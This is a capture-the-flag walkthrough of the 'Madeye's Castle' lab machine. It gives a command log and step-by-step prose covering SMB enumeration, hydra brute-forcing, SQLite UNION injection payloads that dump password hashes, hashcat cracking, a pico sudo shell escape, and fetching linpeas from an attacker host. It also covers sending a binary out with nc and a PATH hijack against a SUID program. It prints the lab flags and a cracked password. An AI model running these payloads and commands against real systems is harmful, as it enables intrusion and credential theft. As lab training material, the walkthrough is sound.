Madeye's Castle - Medium
sudo vim /etc/hosts
#add castle.thm
nmap -T4 -p- -A -Pn -v castle.thm
smbclient -L \\\\castle.thm
#list all shares
smbclient \\\\castle.thm\\sambashare
#access sambashare
mget *
#get all files
#go through files
cat spellnames.txt
cat .notes.txt
sudo vim /etc/hosts
#add hogwartz-castle.thm
#bruteforce login
hydra -l harry -P /usr/share/wordlists/rockyou.txt hogwartz-castle.thm http-post-form "/login:user=harry&password=^PASS^:Incorrect Username or Password"
#does not work
#check for injection
#intercept and save login request with Burp Suite
sqlmap -r hogwartz.req --level 5
#manual injection gives us response
#save this request
sqlmap -r hogwartz2.req --level 5 --risk 3 --dump-all --threads 10
#detects SQLite
#attempt manual SQLi with burp suite
#use SQLite payload and get hashes
#crack the hash
#use best64 rule
hashcat -a 0 -m 1700 harryhash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/doc/hashcat/rules/best64.rule
#login using creds
ssh harry@castle.thm
cat user1.txt
sudo -l
#we can run /usr/bin/pico as hermonine
#GTFObins exploit for 'pico'
sudo -u hermonine /usr/bin/pico
#Ctrl+R, Ctrl+X
reset; sh 1>&0 2>&0
#now we have shell as hermonine
bash
cd /tmp
#in attacker machine
python3 -m http.server
#in victim session
wget http://10.14.31.212:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
ls -la /srv/time-turner
#unknown SUID binary
ls -la /srv/time-turner/swagger
#transfer file from victim to attacker
#in attacker machine
nc -nvlp 4444 > swagger
#in victim machine
nc 10.14.31.212 4444 -w 3 < swagger
#we can now analyse 'swagger' in attacker machine
#using Ghidra, view impressive() function
#in attacker machine
chmod +x swagger
#rand() is vulnerable
for x in {1..3}; do echo 0 | ./swagger; done
#same number is chosen everytime
#we can exploit this
echo 0 | ./swagger | grep -oE '[0-9]+' | ./swagger
#this prints system architecture
#in victim machine
cd /tmp
export PATH=/tmp:$PATH
echo $PATH
echo 'cat /root/root.txt' > /tmp/uname
chmod +x /tmp/uname
#run swagger binary to print root flag
echo 0 | /srv/time-turner/swagger | grep -oE '[0-9]+' | /srv/time-turner/swagger
-
Open ports & services:
- 22 - ssh - OpenSSH 7.6p1 (Ubuntu)
- 80 - http - Apache httpd 2.4.29
- 139 - netbios-ssn - Samba smbd 3.X - 4.X
- 445 - netbios-ssn - Samba smbd 4.7.6-Ubuntu
-
We can start by enumerating the SMB shares using
smbclient. -
We can access one share out of all the three listed - 'sambashare' - the comment shows that these are "Harry's important files".
-
This share includes two files - 'spellnames.txt' and '.notes.txt' - we can go through these.
-
The note shows that we can use the 'rockyou' wordlist later; it also mentions a 'text editor' - we can keep these clues in mind for now.
-
Now, checking the webpage on port 80 shows that it is the default landing page for Apache.
-
However, when viewing its source code, we get a virtual host <hogwartz-castle.thm>
-
We can add this to our /etc/hosts file and visit this page.
-
This new page titled 'Welcome to Hogwartz' is a login portal.
-
We can attempt to bruteforce login as 'harry' using
hydraand we will userockyou.txtas our wordlist. -
While the bruteforce process runs in the background, we can attempt to check for SQL injection.
-
We can intercept the login request using Burp Suite, and save it to a file, and use it with
sqlmap. -
We can also attempt manual SQLi; using the payload
' or 1=1--leads us to a JSON response:
"The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection... keep digging"
-
Now we have two potential usernames - Lucas Washington and administrator.
-
We can continue manual SQL injection.
-
We can also run
sqlmapin background. -
We can use these payloads to determine the number of columns:
admin' UNION SELECT NULL--
#error
admin' UNION SELECT NULL,NULL--
#error
admin' UNION SELECT NULL,NULL,NULL--
#error
admin' UNION SELECT NULL,NULL,NULL,NULL--
#error
- We know that there are 4 columns, we can now attempt to find data type for the columns:
admin' UNION SELECT 'a','a','a','a'--
#confirms that all four columns are of string type
-
Meanwhile,
sqlmapshows that the back-end DBMS isSQLite; we can use payloads specific to SQLite then. -
Payload to print version:
admin' UNION SELECT sqlite_version(),'a','a','a'--
#we get version 3.22.0
- Payload to print table name:
admin' UNION SELECT group_concat(tbl_name),'a','a','a' FROM sqlite_master--
#gives table name 'users'
- Payload to get column names from table 'users':
admin' UNION SELECT sql,'a','a','a' FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name='users'--
#gives columns - name, password, admin, notes
- Payload to get data from all columns:
admin' UNION SELECT group_concat(name||'~'||password||'~'||admin||'~'||notes),'a','a','a' FROM users--
-
As this data can be tough to view in
Burp Suite, we can use this payload in browser and view it in JSON form. -
As we have used the tilde sign (~) as separators, we can see that there are too many entries.
-
However, for one entry, the 'note' column has a different entry:
My linux username is my first name, and password uses best64
-
This entry is for 'Harry Turner'; and 'best64' refers to a
hashcatrule. -
So, we can copy the hash and attempt to crack it using
hashcat- it is a SHA512 hash so we will have to use the corresponding mode. -
Cracking the hash gives us the password "wingardiumleviosa123"; now, we can login.
-
Logging in, we get the message:
Even though Ron said password reuse is bad, I don't really care
-
This means we can attempt to login as 'harry' via SSH using the same password.
-
SSH login works and we get user flag 1.
-
sudo -lshows that we can runpicoprogram as user 'hermonine'. -
GTFObins has a
sudoexploit forpico, so we can use that to get shell as 'hermonine' and get user flag 2. -
For privesc, we can now use
linpeas. -
This identifies an unknown SUID binary
/srv/time-turner/swagger. -
We can transfer this 'swagger' program from victim to attacker machine using
nc, and analyse it usingGhidra. -
In
Ghidra, we can load the 'swagger' program and view the 'main()' function - this uses 'rand()' to generate random numbers and 'impressive()' function to compare the numbers. -
Now, this 'impressive()' function calls
uname -pto print the system architecture as root. -
Furthermore, it uses the relative path, not absolute - so we can use path hijack technique to abuse
uname. -
We can confirm this by using
strings, it works. -
Now, the 'rand()' function is vulnerable, this can be proved by running the program multiple times in loop - it always prints same number.
-
Thus, we can exploit this by feeding a wrong input first, followed by using
grepto get the correct number, and run the program again - this time feeding the correct number as input. -
This works on attacker machine, so we can abuse
unamein victim machine to read the root flag. -
Using path hijacking technique, we can create 'uname' program in /tmp which prints root flag.
-
Now, if we run the 'swagger' program in the same manner as before, it prints the root flag.
1. User1.txt - RME{th3-b0Y-wHo-l1v3d-f409da6f55037fdc}
2. User2.txt - RME{p1c0-iZ-oLd-sk00l-nANo-64e977c63cb574e6}
3. Root.txt - RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}